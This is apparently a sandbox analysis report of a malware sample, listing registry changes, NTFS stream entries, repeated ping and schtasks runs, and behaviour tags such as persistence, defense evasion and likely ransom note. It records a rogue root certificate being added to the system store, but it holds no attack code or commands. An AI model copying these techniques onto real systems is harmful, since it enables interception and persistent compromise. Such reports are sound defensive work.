Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\ = "ProcMon Log File" C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\System32\NOTEPAD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294935296" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME\Database\Content Type\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/html C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell\runas\command C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\ = "ie_to_edge_bho.IEToEdgeBHO.1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\ = "IEToEdgeBHO Class" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\shell\open\command C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win64\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\elevation_service.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationDescription = "Browse the web" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\DefaultIcon\ = "\"C:\\Program Files\\ProcessMonitor\\Procmon64.exe\",0" C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\ = "Microsoft Edge HTML Document" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\shell\runas\ProgrammaticAccessOnly C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\open\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --single-argument %1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\shell\runas\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --do-not-de-elevate --single-argument %1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.htm C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\DisplayName = "PDF Preview Handler" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge\shell\open\command C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ = "Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/pdf C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML\ = "ProcMon.Logfile.1" C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.shtml\OpenWithProgids C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithProgIds\MSEdgeMHT C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML C:\Program Files\sysint\Procmon64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\System32\NOTEPAD.EXE N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell\runas C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\runas\ProgrammaticAccessOnly C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\AppUserModelId = "MSEdge" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\AppUserModelId = "MSEdge" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\DefaultIcon\ = "\"C:\\Users\\Admin\\Downloads\\ProcessMonitor\\Procmon64.exe\",0" C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Windows\System32\NOTEPAD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16 C:\Windows\System32\NOTEPAD.EXE N/A
Key created \REGISTRY\MACHINE\Software\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1\CLSID\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\open C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\System32\NOTEPAD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask C:\Windows\system32\taskmgr.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\ProcessMonitor.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\SysinternalsSuite.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File opened for modification C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION C:\Windows\system32\wbem\wmiprvse.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

